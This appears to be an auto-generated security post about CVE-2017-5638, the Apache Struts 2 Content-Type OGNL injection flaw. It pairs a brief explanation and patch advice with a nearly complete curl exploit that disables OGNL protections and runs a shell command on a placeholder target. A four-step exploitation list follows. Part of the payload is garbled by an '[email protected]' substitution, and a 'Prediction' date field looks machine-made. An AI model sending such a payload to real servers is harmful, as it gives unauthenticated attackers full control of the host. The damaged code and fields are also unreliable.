Listen to this Post
The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in an HTTP request to a Struts 2 endpoint, the parser attempts to process it but fails. During this failure, the framework incorrectly interprets the injected expression as an Object-Graph Navigation Language (OGNL) expression. OGNL is a powerful expression language integrated with Struts that can access and execute Java code. The vulnerability allows an attacker to craft a Content-Type header containing a malicious OGNL expression. Because the flawed exception handling logic passes this unsanitized user input directly to the OGNL interpreter, the expression is evaluated on the server. This evaluation occurs with the same permissions as the running web application, enabling an unauthenticated attacker to achieve remote code execution by submitting a specially crafted HTTP request, effectively gaining full control over the targeted server.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability : Remote Code Execution
Severity: Critical
date: 2017-03-07
Prediction: 2017-03-10
What Undercode Say:
curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target.com/struts2-endpoint
How Exploit:
Craft malicious Content-Type header.
Send HTTP request.
OGNL expression executes.
Gains shell command execution.
Protection from this CVE
Upgrade to Struts 2.3.32 or 2.5.10.1.
Implement WAF rules.
Filter malicious Content-Type headers.
Impact:
Remote Code Execution.
Full System Compromise.
Data Theft.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

